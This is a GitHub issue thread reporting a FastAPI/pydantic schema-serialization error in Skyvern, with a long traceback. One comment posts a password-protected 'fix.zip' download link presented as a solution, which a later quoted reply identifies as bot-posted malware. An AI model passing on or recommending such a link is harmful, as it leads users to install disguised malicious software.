### ISSUE TITLE
Failed to load API definition.

### ISSUE THREAD

**Issue by VittorioYan** [Skyvern-AI/skyvern#745]
![image](https://github.com/user-attachments/assets/72cf0e8e-7672-45c7-b443-fbd072eef1f7)
I try to solve it but I can't identify which model is causing this error.
Here is the exception stack trace.
```
INFO:     127.0.0.1:57614 - "GET /openapi.json HTTP/1.1" 500 Internal Server Error
ERROR:    Exception in ASGI application
Traceback (most recent call last):
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/middleware/base.py", line 78, in call_next
    message = await recv_stream.receive()
              ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/anyio/streams/memory.py", line 98, in receive
    return self.receive_nowait()
           ^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/anyio/streams/memory.py", line 91, in receive_nowait
    raise EndOfStream
anyio.EndOfStream
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/uvicorn/protocols/http/httptools_impl.py", line 426, in run_asgi
    result = await app(  # type: ignore[func-returns-value]
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/uvicorn/middleware/proxy_headers.py", line 84, in __call__
    return await self.app(scope, receive, send)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/fastapi/applications.py", line 1106, in __call__
    await super().__call__(scope, receive, send)
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/applications.py", line 122, in __call__
    await self.middleware_stack(scope, receive, send)
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/middleware/errors.py", line 184, in __call__
    raise exc
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/middleware/errors.py", line 162, in __call__
    await self.app(scope, receive, _send)
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/middleware/base.py", line 108, in __call__
    response = await self.dispatch_func(request, call_next)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/skyvern/forge/api_app.py", line 98, in request_middleware
    return await call_next(request)
           ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/middleware/base.py", line 84, in call_next
    raise app_exc
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/middleware/base.py", line 70, in coro
    await self.app(scope, receive_or_disconnect, send_no_error)
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette_context/middleware/raw_middleware.py", line 92, in __call__
    await self.app(scope, receive, send_wrapper)
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/middleware/cors.py", line 83, in __call__
    await self.app(scope, receive, send)
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/middleware/exceptions.py", line 79, in __call__
    raise exc
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/middleware/exceptions.py", line 68, in __call__
    await self.app(scope, receive, sender)
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/fastapi/middleware/asyncexitstack.py", line 20, in __call__
    raise e
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/fastapi/middleware/asyncexitstack.py", line 17, in __call__
    await self.app(scope, receive, send)
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/routing.py", line 718, in __call__
    await route.handle(scope, receive, send)
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/routing.py", line 276, in handle
    await self.app(scope, receive, send)
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/starlette/routing.py", line 66, in app
    response = await func(request)
               ^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/fastapi/applications.py", line 1061, in openapi
    return JSONResponse(self.openapi())
                        ^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/fastapi/applications.py", line 1033, in openapi
    self.openapi_schema = get_openapi(
                          ^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/fastapi/openapi/utils.py", line 475, in get_openapi
    field_mapping, definitions = get_definitions(
                                 ^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/fastapi/_compat.py", line 227, in get_definitions
    field_mapping, definitions = schema_generator.generate_definitions(
                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 376, in generate_definitions
    self.generate_inner(schema)
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 551, in generate_inner
    json_schema = current_handler(schema)
                  ^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/_internal/_schema_generation_shared.py", line 36, in __call__
    return self.handler(core_schema)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 508, in handler_func
    json_schema = generate_for_schema_type(schema_or_field)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 845, in list_schema
    items_schema = {} if 'items_schema' not in schema else self.generate_inner(schema['items_schema'])
                                                           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 551, in generate_inner
    json_schema = current_handler(schema)
                  ^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/_internal/_schema_generation_shared.py", line 36, in __call__
    return self.handler(core_schema)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 525, in new_handler_func
    json_schema = js_modify_function(schema_or_field, current_handler)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/main.py", line 652, in __get_pydantic_json_schema__
    return handler(core_schema)
           ^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/_internal/_schema_generation_shared.py", line 36, in __call__
    return self.handler(core_schema)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 525, in new_handler_func
    json_schema = js_modify_function(schema_or_field, current_handler)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/_internal/_generate_schema.py", line 220, in modify_model_json_schema
    json_schema = handler(schema_or_field)
                  ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/_internal/_schema_generation_shared.py", line 36, in __call__
    return self.handler(core_schema)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 508, in handler_func
    json_schema = generate_for_schema_type(schema_or_field)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 1392, in model_schema
    json_schema = self.generate_inner(schema['schema'])
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 551, in generate_inner
    json_schema = current_handler(schema)
                  ^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/_internal/_schema_generation_shared.py", line 36, in __call__
    return self.handler(core_schema)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 508, in handler_func
    json_schema = generate_for_schema_type(schema_or_field)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 1484, in model_fields_schema
    json_schema = self._named_required_fields_schema(named_required_fields)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 1295, in _named_required_fields_schema
    field_json_schema = self.generate_inner(field).copy()
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 551, in generate_inner
    json_schema = current_handler(schema)
                  ^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/_internal/_schema_generation_shared.py", line 36, in __call__
    return self.handler(core_schema)
           ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/json_schema.py", line 543, in new_handler_func
    json_schema = js_modify_function(schema_or_field, current_handler)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/_internal/_generate_schema.py", line 2180, in json_schema_update_func
    add_json_schema_extra(json_schema, json_schema_extra)
  File "/Users/vittorio/Documents/code/github/skyvern/.venv/lib/python3.11/site-packages/pydantic/_internal/_generate_schema.py", line 2190, in add_json_schema_extra
    json_schema.update(to_jsonable_python(json_schema_extra))
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
pydantic_core._pydantic_core.PydanticSerializationError: Unable to serialize unknown type: <class 'type'>
```

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VittorioYan** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

Sorry，what's this?

**Comment by VittorioYan** [comment]
> > > Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."
> > 
> > 
> > Sorry，what's this?
> 
> That is a bot posting malware. Be careful.

Thank you ,that's so disgusting
